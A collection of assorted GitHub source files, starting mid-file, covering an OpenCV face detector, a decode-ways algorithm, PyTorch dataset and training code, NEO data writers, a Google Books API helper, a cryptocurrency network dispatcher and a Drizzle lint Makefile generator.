No captured frame -- Break!')\r\n break\r\n detectAndDisplay(frame)\r\n if cv.waitKey(10) == 27:\r\n break\r\n\r\n def detectAndDisplay(frame):\r\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n frame_gray = cv.equalizeHist(frame_gray)\r\n #-- Face\r\n faces = face_cascade.detectMultiScale(frame_gray)\r\n for (x,y,w,h) in faces:\r\n \"\"\"\r\n x = x_faceArea_point_width\r\n y = y_faceArea_point_height\r\n w = lenght_weight\r\n h = lenght_height\r\n \"\"\"\r\n center = (x + w//2, y + h//2)\r\n frame = cv.ellipse(frame, center, (w//2, h//2), 0, 0, 360, (255, 0, 255), 4)\r\n faceROI = frame_gray[y:y+h,x:x+w]\r\n #--Eyes \r\n eyes = eyes_cascade.detectMultiScale(faceROI)\r\n for (x2,y2,w2,h2) in eyes:\r\n \"\"\"\r\n x2 = x_eyeArea_point_width\r\n y2 = y_faceArea_point_height\r\n w2 = lenght_weight_of_eyeArea\r\n h2 = lenght_height_of_eyearea\r\n \"\"\"\r\n eye_center = (x + x2 + w2//2, y + y2 + h2//2)\r\n radius = int(round((w2 + h2)*0.25))\r\n frame = cv.circle(frame, eye_center, radius, (255, 0, 0 ), 4)\r\n cv.imshow('Yuz Tanımlama', frame)\r\n\r\nf=FaceRecognition()\r\nf\r\n\"\"\"\r\n#test\r\ndef detectAndDisplay(frame):\r\n font = cv.FONT_HERSHEY_SIMPLEX\r\n frame=cv.flip(frame,1)\r\n frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n frame = cv.equalizeHist(frame)\r\n #-- Detect faces\r\n faces = face_cascade.detectMultiScale(frame)\r\n #print(faces)\r\n for (x,y,w,h) in faces:\r\n center = (x + w//2, y + h//2)\r\n #frame = cv.ellipse(frame, center, (w//2, h//2), 0, 0, 360, (20, 250, 20), 4)\r\n cv.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n faceROI = frame_gray[y:y+h,x:x+w]\r\n cv.line(frame,(x + w//2, y + h//2+20),(x + w//2,y+h),(0,200,200),2)\r\n cv.putText(frame,'Yuz',(x, y-10), font, 1,(60,25,5),1,cv.LINE_AA)\r\n #-- In each face, detect eyes\r\n eyes = eyes_cascade.detectMultiScale(faceROI)\r\n #print(eyes)\r\n if not numpy.any(eyes):\r\n cv.putText(frame,'Goz Tespit Edilmedi',(x, y + h), font, 1,(25,25,250),1)\r\n for (x2,y2,w2,h2) in eyes:\r\n eye_center = (x + x2 + w2//2, y + y2 + h2//2)\r\n radius = int(round((w2 + h2)*0.2))\r\n frame = cv.circle(frame, eye_center, radius, (255, 0, 0 ), 2)\r\n cv.putText(frame,'Gozler',(x + x2 + w2//2, y + y2 + h2//2-10), font, 1,(25,25,25),1)\r\n cv.line(frame,(x + w//2, y + h//2+20),eye_center,(0,200,200),2)\r\n cv.line(frame,(x + w//2, y + y2 + h2//2),eye_center,(200,200,0),2)\r\n cv.imshow('Capture - Face detection', frame)\r\n \r\n\r\nface_cascade = cv.CascadeClassifier(\"haarcascades/haarcascade_frontalface_alt.xml\")\r\neyes_cascade = cv.CascadeClassifier(\"haarcascades/haarcascade_eye.xml\")\r\ncap = cv.VideoCapture(0)\r\nif not cap.isOpened:\r\n print('--(!)Hata Kamera açılmadı')\r\n exit(0)\r\nwhile True:\r\n ret, frame = cap.read()\r\n if frame is None:\r\n print('--(!) 
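The `FaceRecognition.__init__` above cannot run as written: it reads `face_cascade`, `eyes_cascade` and `cap` as bare names before they exist in scope, and calls `detectAndDisplay(frame)` on locals that were never assigned. A minimal working skeleton of the same capture-detect-draw loop, assuming the cascade XML path is valid on the machine:

```python
import cv2 as cv

face_cascade = cv.CascadeClassifier(
    cv.samples.findFile('data/haarcascades/haarcascade_frontalface_alt.xml'))
cap = cv.VideoCapture(0)
while cap.isOpened():
    ok, frame = cap.read()
    if not ok:
        break
    gray = cv.equalizeHist(cv.cvtColor(frame, cv.COLOR_BGR2GRAY))
    for (x, y, w, h) in face_cascade.detectMultiScale(gray):
        cv.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
    cv.imshow('faces', frame)
    if cv.waitKey(10) == 27:  # ESC quits
        break
cap.release()
cv.destroyAllWindows()
```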
Görüntü algılanamadı')\r\n break\r\n detectAndDisplay(frame)\r\n if cv.waitKey(10) == 27 or cv.waitKey(10) == 0xFF:\r\n break \r\n\r\ncap.release()\r\ncv.destroyAllWindows()\r\n\r\nwhile True:\r\n #Capture frame-by-frame\r\n ret, frame = video_capture.read()\r\n frame=cv2.flip(frame,1)\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor=1.5,\r\n minNeighbors=5,\r\n minSize=(30, 30),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n cv2.imshow('FaceDetection', frame)\r\n #ESC Pressed\r\n key = cv2.waitKey(10) \r\n if key == 27: \r\nı break\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n\"\"\"\r\n","repo_name":"sezerblt/CameraAlgorithmRepo","sub_path":"face_recog_v1.py","file_name":"face_recog_v1.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35512125049","text":"# total ways to decode a string\n# given that string will not begin with 0 or any invalid character\n# ex , 123 =a,ab,abc,aw\n\ndef ways(string):\n dp = [0 for i in range(len(string))]\n dp[0]=1\n for i in range(1,len(dp)):\n if string[i-1]=='0' and string[i]=='0': #last_two='00'\n # that means no move can be made , so just put 0\n dp[i]=0\n elif string[i-1]=='0' and string[i]!='0': #last_two='0NonZero'\n # this means that we can use only i and not i-1 and i together , in this case put the i-1 value\n dp[i]=dp[i-1]\n elif string[i-1]!='0' and string[i]=='0': #last_two='NonZero0'\n # this means that we can use only i-1 and i together , not i alone\n # in this case we first check if the string forming is less than or equal to 26\n if string[i-1]=='1' or string[i-1]=='2':\n # if the length of string is not lesss than 2\n if i>=2:\n # then we have to take the value prior to nonzero , ie i-2 , 2310-> 23-10\n dp[i]=dp[i-2]\n else:\n # if the length of string is less than 2 then , we just put 1\n dp[i]=1\n else:\n # if the string is bigger than 26 then now way is there , so 0\n dp[i]=0\n else:\n # last_two='NonZeroNonZero\n # in this case we first check if the string forming is less than or equal to 26\n if string[i-1]=='1' or string[i-1]=='2':\n if i>=2:\n # if the length of string is not lesss than 2\n # in case the string is less or equal to 26 and length of string is >=2\n # then we take the sum of 2 values prior to 1\n dp[i]=dp[i-1]+dp[i-2]\n else:\n # if the length of string is less than 2 then , we just take i-1 and add 1 to it\n dp[i]=dp[i-1]+1\n else:\n # if the last_two is greater than 26 , then jsut put the i-1\n dp[i]=dp[i-1]\n # return the last value \n return dp[-1]\n\n\nstring = '231011'\nprint(ways(string))\n","repo_name":"AbhinavSingh111/HackerRank-DS","sub_path":"decode_ways.py","file_name":"decode_ways.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28508755775","text":"import os\nimport torch\nfrom torch.utils.data import IterableDataset\nfrom itertools import cycle\nfrom collections import defaultdict\n\"\"\"\nCustom iterable dataset for streaming in data and data processing utils.\n\"\"\"\n\ndef list_files(directory, ignore_str=\"json\"):\n # ignore_str set to json to skip nbest files\n files = [os.path.join(directory, file) for file in os.listdir(directory) if ignore_str not in file\\\n and os.path.isfile(os.path.join(directory,file))]\n return 
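The `decode_ways` record above implements the standard staircase DP, but its last branch adds the two-digit count whenever the previous digit is '1' or '2', so it also accepts 27-29, which fall outside the 1-26 code range. A compact O(1)-space version with that boundary fixed; both return 4 for '231011':

```python
def ways_compact(s: str) -> int:
    # prev2/prev1 = ways to decode the prefixes ending two/one positions back;
    # input is assumed (as in the file) not to start with '0'
    prev2, prev1 = 1, 1
    for i in range(1, len(s)):
        cur = prev1 if s[i] != '0' else 0                         # single digit 1-9
        if s[i - 1] == '1' or (s[i - 1] == '2' and s[i] <= '6'):  # pair 10-26 only
            cur += prev2
        prev2, prev1 = prev1, cur
    return prev1

print(ways_compact('231011'))  # 4
print(ways_compact('27'))      # 1 -- the loop above reports 2
```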
files\n\ndef return_split(file_name):\n split = file_name.split('/')[-1]\n return split\n\ndef get_next_utterance(directory, sort_by_function=return_split):\n ''' A generator that yields the next utterance '''\n data_files = list_files(directory)\n data_files.sort(key=sort_by_function, reverse=True)\n\n for idx, file_path in enumerate(data_files):\n with open(file_path, \"r\") as transcription_fp:\n for line in transcription_fp:\n yield line\n\ndef custom_collate(batch):\n \"\"\"Collate function to deal with variable length input \"\"\"\n batch_size = len(batch)\n max_len = max([sample[\"text_len\"] for sample in batch])\n\n # IMPORTANT: Enforce padding token to be 0\n padded_input = torch.zeros((batch_size, max_len))\n padded_output = torch.zeros((batch_size, max_len))\n text_len = []\n\n md, md_len = defaultdict(list), defaultdict(list)\n\n for idx, sample in enumerate(batch):\n curr_len = sample[\"text_len\"]\n text_len.append(curr_len)\n padded_input[idx, :curr_len] = sample[\"input\"]\n padded_output[idx, :curr_len] = sample[\"output\"]\n\n sample_md = sample[\"md\"]\n sample_md_len = sample[\"md_len\"]\n if sample_md is None:\n md = None\n md_len = None\n continue\n\n for curr_md_transform, curr_md in sample_md.items():\n md[curr_md_transform].append(curr_md)\n\n for curr_md_transform, curr_md_len in sample_md_len.items():\n md_len[curr_md_transform].append(curr_md_len)\n\n\n text_len = torch.stack(text_len)\n\n if md:\n for curr_md_transform in md.keys():\n md[curr_md_transform] = torch.stack(md[curr_md_transform])\n for curr_md_transform in md.keys():\n md_len[curr_md_transform] = torch.stack(md_len[curr_md_transform])\n\n processed_batch = {\"input\": padded_input,\n \"output\": padded_output,\n \"md\": md,\n \"text_len\": text_len,\n \"md_len\": md_len}\n\n return processed_batch\n\n\nclass MetaDataset(IterableDataset):\n \"\"\"Dataset that can include meta data information. 
\"\"\"\n\n def __init__(self, data_directory, tokenizer, md_transformer):\n self.data_directory = data_directory\n self.tokenizer = tokenizer\n self.md_transformer = md_transformer\n self.cycle_data = \"train\" in data_directory\n\n def generate_processed_stream(self):\n for utterance in get_next_utterance(self.data_directory):\n md_dict, text = self.md_transformer.parse_raw_input(utterance)\n input = torch.tensor(self.tokenizer.encode_text(text, add_sos=True))\n output = torch.tensor(self.tokenizer.encode_text(text, add_eos=True))\n text_len = torch.tensor(len(input))\n\n if md_dict:\n md = {}\n md_len = {}\n for curr_md_transform, curr_md in md_dict.items():\n if not isinstance(curr_md, torch.Tensor):\n curr_md = torch.tensor(self.tokenizer.encode_text(curr_md))\n curr_md_len = torch.tensor(len(curr_md))\n else:\n curr_md_len = torch.tensor(1)\n\n md[curr_md_transform] = curr_md\n md_len[curr_md_transform] = curr_md_len\n\n else:\n md = None\n md_len = None\n\n sample = {\"input\": input,\n \"output\": output,\n \"md\": md,\n \"text_len\": text_len,\n \"md_len\": md_len}\n yield sample\n\n def __iter__(self):\n if self.cycle_data:\n return cycle(self.generate_processed_stream())\n else:\n return self.generate_processed_stream()\n","repo_name":"amazon-science/contextual-attention-nlm","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"17839250070","text":"\"\"\"Write a stream of close approaches to CSV or to JSON.\r\n\r\nThis module exports two functions: `write_to_csv` and `write_to_json`, each of\r\nwhich accept an `results` stream of close approaches and a path to which to\r\nwrite the data.\r\n\r\nThese functions are invoked by the main module with the output of the `limit`\r\nfunction and the filename supplied by the user at the command line. The file's\r\nextension determines which of these functions is used.\r\n\r\nYou'll edit this file in Part 4.\r\n\"\"\"\r\nimport csv\r\nimport json\r\n\r\n\r\ndef write_to_csv(results, filename):\r\n \"\"\"Write an iterable of `CloseApproach` objects to a CSV file.\r\n\r\n The precise output specification is in `README.md`. Roughly, each output row\r\n corresponds to the information in a single close approach from the `results`\r\n stream and its associated near-Earth object.\r\n\r\n :param results: An iterable of `CloseApproach` objects.\r\n :param filename: A Path-like object pointing to where the data should be saved.\r\n \"\"\"\r\n fieldnames = (\r\n 'datetime_utc', 'distance_au', 'velocity_km_s',\r\n 'designation', 'name', 'diameter_km', 'potentially_hazardous'\r\n )\r\n # Done: Write the results to a CSV file, following the specification in the instructions.\r\n with open(filename, \"w\", newline=\"\") as output_file:\r\n writer = csv.DictWriter(output_file, fieldnames=fieldnames)\r\n writer.writeheader()\r\n for row in results:\r\n #info = row.serialize() | row.neo.serialize() works on python 3.9\r\n d1,d2 = row.serialize(),row.neo.serialize()\r\n info = {**d1,**d2}\r\n info[\"name\"] = info[\"name\"] if info[\"name\"] is not None else \"\"\r\n info[\"potentially_hazardous\"] = (\r\n \"True\" if info[\"potentially_hazardous\"] else \"False\"\r\n )\r\n writer.writerow(info)\r\n\r\n\r\ndef write_to_json(results, filename):\r\n \"\"\"Write an iterable of `CloseApproach` objects to a JSON file.\r\n\r\n The precise output specification is in `README.md`. 
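A toy check of the padding contract `custom_collate` above relies on: tensors are right-padded with 0 (the id the file pins as the padding token) out to the longest sample, with true lengths kept alongside.

```python
import torch

batch = [torch.tensor([5, 6, 7]), torch.tensor([8, 9])]
max_len = max(t.numel() for t in batch)
padded = torch.zeros(len(batch), max_len, dtype=torch.long)  # pad id is 0
for i, t in enumerate(batch):
    padded[i, :t.numel()] = t
print(padded)                                    # [[5, 6, 7], [8, 9, 0]]
print(torch.tensor([t.numel() for t in batch]))  # lengths [3, 2]
```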
Roughly, the output is a\r\n list containing dictionaries, each mapping `CloseApproach` attributes to\r\n their values and the 'neo' key mapping to a dictionary of the associated\r\n NEO's attributes.\r\n\r\n :param results: An iterable of `CloseApproach` objects.\r\n :param filename: A Path-like object pointing to where the data should be saved.\r\n \"\"\"\r\n # done: Write the results to a JSON file, following the specification in the instructions.\r\n output_data = []\r\n for row in results:\r\n d1,d2 = row.serialize(),row.neo.serialize()\r\n #info = row.serialize() | row.neo.serialize() # Use python 3.9 or higher\r\n info = {**d1,**d2}\r\n info[\"name\"] = info[\"name\"] if info[\"name\"] is not None else \"\"\r\n info[\"potentially_hazardous\"] = (\r\n bool(1) if info[\"potentially_hazardous\"] else bool(0)\r\n )\r\n output_data.append(\r\n {\r\n \"datetime_utc\": info[\"datetime_utc\"],\r\n \"distance_au\": info[\"distance_au\"],\r\n \"velocity_km_s\": info[\"velocity_km_s\"],\r\n \"neo\": {\r\n \"designation\": info[\"designation\"],\r\n \"name\": info[\"name\"],\r\n \"diameter_km\": info[\"diameter_km\"],\r\n \"potentially_hazardous\": info[\"potentially_hazardous\"],\r\n },\r\n }\r\n )\r\n\r\n with open(filename, \"w\") as file:\r\n json.dump(output_data, file, indent=\"\\t\")\r\n","repo_name":"manojkumar1053/ADV-Python-01","sub_path":"write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25754908667","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 11 09:32:31 2022\n\n@author: books\n\"\"\"\n\nimport requests\nimport json\n\ndef search_google_books(author=None, isbn=None, title=None, num_results=1, language=\"en\", verbose=False):\n \"\"\"\n Searches for book information from the Google Books API. 
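The `{**d1, **d2}` spelling the writer module falls back on (its comments note `d1 | d2` needs Python 3.9) is behaviorally identical to the `|` operator: on key collisions the right-hand dict wins in both.

```python
d1 = {'designation': '433', 'name': 'Eros'}
d2 = {'name': 'Eros (433)', 'diameter_km': 16.84}
merged = {**d1, **d2}
assert merged == d1 | d2               # Python 3.9+
assert merged['name'] == 'Eros (433)'  # right-hand dict wins on collisions
```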
\\\n Information is first retreived in JSON format, and \\\n then parsed to a list of dictionaries.\n \n :param author: Part of author name (first and/or last)\n :type author: str\n :param isbn: ISBN10 or ISBN13\n :type isbn: str or int\n :param title: Part of the book title\n :type title: str\n :param num_results: Number of results to be returned\n :type num_results: int\n :param language: String of the 2-character laguage code\\\n for the desired language\n :type language: str\n \n \"\"\"\n query_url=\"https://www.googleapis.com/books/v1/volumes?q=\"\n if author!=None and author!='':\n query_url=query_url+\"inauthor:\"+author+\"+\"\n if isbn!=None and isbn!='':\n query_url=query_url+\"isbn:\"+isbn +\"+\"\n if title!=None and title!='':\n query_url=query_url+\"intitle:\"+title\n query_url=query_url.strip(\"+\")\n query_url=query_url+\"&langRestrict=\"+language\n \n #query_url=query_url.strip(\"&\")\n \n if verbose==True:\n print(query_url)\n r=requests.get(query_url)\n return json.loads(r.text)['items'][0:num_results]\n\ndef parse_google_record(record):\n \"\"\"\n Removes unnecessary key/values from record and returns a \\\n dictionary with only necessary key/values.\n \n :param record: dictionary representing a book\n :type record: dict\n :returns: dictionary with only necessary key/values\n :rtype: dict\n \"\"\"\n try:\n volume_info=record['volumeInfo']\n title=volume_info['title']\n authors=volume_info['authors'][0]\n publisher=volume_info['publisher']\n publish_date=volume_info['publishedDate']\n description=volume_info['description']\n identifiers=volume_info['industryIdentifiers']\n isbn10=None\n isbn13=None\n for item_dict in identifiers:\n if len(item_dict['identifier'])==10:\n isbn10=item_dict['identifier']\n elif len(item_dict['identifier'])==13:\n isbn13=item_dict['identifier']\n page_count=volume_info['pageCount']\n parsed_dict={'title':title, 'authors':authors,\\\n 'publisher':publisher, 'publish_date':publish_date,\\\n 'description':description, 'isbn10':isbn10,\\\n 'isbn13':isbn13, 'page_count':page_count}\n return parsed_dict\n except:\n print('Error occured.')","repo_name":"cbrewer97/books-catalog","sub_path":"src/google_tools.py","file_name":"google_tools.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232713624","text":"score = 0\nmax_score = 0\nbest_player = \"\"\nmax_score = 0\n\nwhile True:\n name = input()\n if name == \"Stop\":\n break\n score = 0\n for i in range(len(name)):\n number = int(input())\n if number == ord(name[i]):\n score += 10\n else:\n score +=2\n\n if score >= max_score:\n max_score = score\n best_player = name\n\nprint(F\"The winner is {best_player} with {max_score} points!\")\n\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_6_and_7_July_2019/06_Name_Game.py","file_name":"06_Name_Game.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42436521402","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 5 13:57:15 2022\r\n\r\n@author: wangqinyu\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom tabnanny import verbose\r\nimport torch\r\nimport numpy as np\r\nfrom Loss import CtdetLoss\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torch.optim.lr_scheduler import StepLR\r\n\r\nfrom dataset import ctDataset,ctDataset_DSB\r\nimport 
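`search_google_books` above builds its URL by string concatenation, so an author or title containing spaces or reserved characters goes out unencoded. A sketch of the same query via the `params` argument, which lets `requests` do the percent-encoding; the search terms are illustrative:

```python
import requests

def build_query(author=None, isbn=None, title=None):
    parts = []
    if author:
        parts.append(f"inauthor:{author}")
    if isbn:
        parts.append(f"isbn:{isbn}")
    if title:
        parts.append(f"intitle:{title}")
    return " ".join(parts)  # requests encodes the separators safely

r = requests.get(
    "https://www.googleapis.com/books/v1/volumes",
    params={"q": build_query(title="flowers for algernon"), "langRestrict": "en"},
)
print(r.status_code)
```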
pickle\r\n\r\nsys.path.append(r'./backbone')\r\nfrom charnet import CharNet\r\nfrom resnet_fpn import ResNet\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1' \r\nuse_gpu = torch.cuda.is_available()\r\n\r\nmodel = ResNet(50)\r\nmodel = torch.nn.DataParallel(model)\r\ncuda = True if torch.cuda.is_available() else False\r\nFloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\r\n\r\nloss_weight={'hm_weight':1,'wh_weight':0.1,'reg_weight':0.1,'mask_weight':0.5}\r\n# loss_weight={'hm_weight':0.,'wh_weight':0.,'reg_weight':0.,'mask_weight':1}\r\ncriterion = CtdetLoss(loss_weight)\r\n\r\ndevice = torch.device(\"cuda\")\r\nif use_gpu:\r\n model.cuda()\r\n\r\n# model.load_state_dict(torch.load('./weights/OWN/resnet101fpn_1108_epoch_3.pth'))\r\n\r\n\r\nmodel.train()\r\n\r\nlearning_rate = 1.25e-4\r\nnum_epochs = 60\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), \r\n lr=learning_rate, \r\n weight_decay=1.25e-4) \r\nlr_scheduler = StepLR(optimizer,\r\n step_size=20,\r\n gamma=0.5,\r\n verbose=True)\r\n\r\ntrain_dataset = ctDataset_DCCB(split='train')\r\ntrain_loader = DataLoader(train_dataset,batch_size=8,shuffle=False,num_workers=4) # num_workers是加载数据(batch)的线程数目\r\n\r\ntest_dataset = ctDataset_DCCB(split='val')\r\ntest_loader = DataLoader(test_dataset,batch_size=1,shuffle=False,num_workers=4)\r\nprint('the dataset has %d images' % (len(train_dataset)))\r\n\r\n\r\nnum_iter = 0\r\n\r\nbest_test_loss = np.inf \r\n#! write logs\r\nwriter = SummaryWriter('./visualization/DCCB')\r\nfor epoch in range(0,num_epochs):\r\n model.train()\r\n \r\n # total_loss = 0.\r\n for i, sample in enumerate(train_loader):\r\n # print(sample.keys())\r\n for k in sample:\r\n sample[k] = sample[k].to(device=device, non_blocking=True)\r\n # print(sample[k].shape)\r\n pred = model(sample['input'])\r\n \r\n # loss = criterion(pred, sample)\r\n hm_loss, wh_loss, reg_loss, mask_loss = criterion(pred, sample) \r\n loss = hm_loss + wh_loss + reg_loss + mask_loss\r\n \r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n if (i+1) % 5 == 0:\r\n print ('Epoch [%d/%d], Iter [%d/%d] total_loss: %.4f hm_oss: %.4f wh_loss: %.4f reg_loss: %.4f mask_loss: %.4f' \r\n %(epoch, num_epochs, i+1, len(train_loader), \r\n loss.item(), \r\n hm_loss.item(), \r\n wh_loss.item(), \r\n reg_loss.item(), \r\n mask_loss))\r\n num_iter += 1\r\n \r\n # if (i+1) % 10000 == 0:\r\n # torch.save(model.state_dict(),'./weights/OWN/resnet50fpn_0107_epoch_{}_{}.pth'.format(epoch,i+1),_use_new_zipfile_serialization=False)\r\n # writer.add_scalar(\"train/dsb_shrink06_total\", loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_hm\", hm_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_wh\", wh_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_reg\", reg_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_mask\", mask_loss.data, i + (epoch-1) * len(train_loader)) \r\n \r\n \r\n validation_loss = 0.0\r\n model.eval()\r\n for i, sample in enumerate(test_loader):\r\n if use_gpu:\r\n for k in sample:\r\n sample[k] = sample[k].to(device=device, non_blocking=True)\r\n\r\n pred = model(sample['input'])\r\n # loss = criterion(pred, sample)\r\n hm_loss, wh_loss, reg_loss, mask_loss = criterion(pred, sample) \r\n val_loss = hm_loss + wh_loss + reg_loss + mask_loss\r\n\r\n validation_loss += val_loss.item()\r\n \r\n validation_loss /= len(test_loader)\r\n 
writer.add_scalar(\"test_loss/DSB_test0607_1\", validation_loss, epoch+1)\r\n \r\n # writer.add_scalar(\"test/total\", loss.data, epoch)\r\n # writer.add_scalar(\"test/hm\", hm_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/wh\", wh_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/reg\", reg_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/mask\", mask_loss.data, i + (epoch-1) * len(train_loader))\r\n \r\n \r\n torch.save(model.state_dict(),'./weights/epoch_{}.pth'.format(epoch),_use_new_zipfile_serialization=False)\r\n lr_scheduler.step()\r\n","repo_name":"Wang-Qinyu/CellNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71476754088","text":"from typing import Optional\nfrom app.models.wallets import NetworkType, CryptocurrencyType\n\nfrom .base import CryptocurrencyInterface\nfrom .btc import Bitcoin\nfrom .erc20 import Erc20Network\nfrom .trc20 import TRC20Network\n\n\nclass CryptoService:\n def __init__(\n self,\n bitcoin_network: Bitcoin,\n erc20_network: Erc20Network,\n trc20_network: TRC20Network\n ) -> None:\n self._bitcoin_network = bitcoin_network\n self._erc20_network = erc20_network\n self._trc20_network = trc20_network\n\n def __call__(\n self,\n network: NetworkType,\n cryptocurrency: Optional[CryptocurrencyType] = None\n ) -> CryptocurrencyInterface:\n if network == NetworkType.bitcoin_network:\n return self._bitcoin_network\n elif network == NetworkType.trc20:\n if not cryptocurrency:\n return self._trc20_network(CryptocurrencyType.trx)\n return self._trc20_network(cryptocurrency)\n elif network == NetworkType.erc20:\n if not cryptocurrency:\n return self._erc20_network(CryptocurrencyType.ethereum)\n return self._erc20_network(cryptocurrency)\n\n","repo_name":"EasyDev-co/PaymentCryptoService","sub_path":"app/app/services/crypto/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3930319970","text":"import os.path\nsrcdir = os.environ.get('srcdir','.')\npath = os.path.join(srcdir, 'config', 'lint-rules.am')\n\n# relpath import (available in Python 2.6 and above)\ntry:\n relpath = os.path.relpath\nexcept AttributeError:\n\n from os.path import curdir, sep, pardir, join\n\n def relpath(path, start=curdir):\n \"\"\"Return a relative version of a path\"\"\"\n\n if not path:\n raise ValueError(\"no path specified\")\n\n start_list = os.path.abspath(start).split(sep)\n path_list = os.path.abspath(path).split(sep)\n\n # Work out how much of the filepath is shared by start and path.\n i = len(os.path.commonprefix([start_list, path_list]))\n\n rel_list = [pardir] * (len(start_list)-i) + path_list[i:]\n if not rel_list:\n return curdir\n return join(*rel_list)\n\nclass ChangeProtectedFile(object):\n # from register_plugins.py. XXX: duplication. 
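Two notes on the training script above: it imports `ctDataset` and `ctDataset_DSB` but instantiates `ctDataset_DCCB`, which raises NameError unless that class exists in `dataset.py` beyond this excerpt; and its validation loop runs with autograd enabled, so every forward pass builds a graph it never uses. A sketch of the usual evaluation pattern for this script's four-part loss signature:

```python
import torch

def evaluate(model, loader, criterion, device):
    model.eval()
    total = 0.0
    with torch.no_grad():  # the loop above omits this; it saves memory and time
        for sample in loader:
            sample = {k: v.to(device, non_blocking=True) for k, v in sample.items()}
            hm, wh, reg, mask = criterion(model(sample['input']), sample)
            total += (hm + wh + reg + mask).item()
    model.train()  # restore training mode before the next epoch
    return total / max(len(loader), 1)
```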
fix.\n\n def __init__(self, fname):\n self.bogus_file= False\n self.real_fname= fname\n self.new_fname= \"%s.new\" % fname\n try:\n self.new_file= open(self.new_fname,'w+')\n except IOError:\n self.bogus_file= True\n\n def write(self, text):\n if not self.bogus_file:\n self.new_file.write(text)\n\n # We've written all of this out into .new files, now we only copy them\n # over the old ones if they are different, so that we don't cause \n # unnecessary recompiles\n def close(self):\n \"\"\"Return True if the file had changed.\"\"\"\n if self.bogus_file:\n return\n self.new_file.seek(0)\n new_content = self.new_file.read()\n self.new_file.close()\n try:\n old_file = file(self.real_fname, 'r')\n old_content = old_file.read()\n old_file.close()\n except IOError:\n old_content = None\n if new_content != old_content:\n if old_content != None:\n os.unlink(self.real_fname)\n os.rename(self.new_fname, self.real_fname)\n return True\n else:\n try:\n os.unlink(self.new_fname)\n except:\n pass\noutput = ChangeProtectedFile(path)\n\n# We write a makefile that causes:\n# linted to depend on linting all the source files we find\n# linting a source file to depend on the output dep file for that linted file.\n\n\ndef lint_path(path):\n # linted depends on linting this:\n output.write('linted: %s.linted\\n' % path)\n output.write('%s.linted: %s\\n' % (path, path))\n # the thing being linted depends on the dependencies included in\n # the lint output\n #output.write('@am__include@ @am__quote@%s.linted@am__quote@\\n' % path)\n # If the lint file doesn't exist, we'll make one, or else we have to do\n # a full lint run on every fresh bzr checkout, which is sort of silly\n #if not os.path.exists(\"%s.linted\" % path):\n # lint_file = open(\"%s.linted\" % path,\"w\")\n # lint_file.write(\"# Placeholder to make empty file\")\n # lint_file.close()\n\n\ndef clean_lints(paths):\n output.write('cleanlints:\\n')\n # batch in 50\n for pos in range(len(paths)/50 + 1):\n path_str = ' '.join((path + '.linted') for path in paths[pos *50:(pos + 1)*50])\n if not path_str:\n continue\n output.write('\\trm -f %s\\n' % path_str)\n\n\ndef should_lint(path):\n if not (path.endswith('.cc') or path.endswith('.h')):\n return False\n if not (path.startswith('plugin/') or path.startswith('drizzled/') or\n path.startswith('client/')):\n return False\n # Let's not lint emacs autosave files\n if (os.path.split(path)[-1].startswith('.#')):\n return False\n # We need to figure out how to better express this\n for exclude in ['innobase', 'pbxt', 'pbms', 'gnulib', '.pb.', 'bak-header', 'm4',\n 'sql_yacc', 'gperf', 'drizzled/probes.h',\n 'drizzled/function_hash.h', 'drizzled/symbol_hash.h',\n 'util/dummy.cc', 'drizzled/sql_yacc.h', 'drizzled/configmake.h',\n\t'drizzled/plugin/version.h',\n 'drizzled/generated_probes.h',\n 'drizzled/module/load_list.h']:\n if 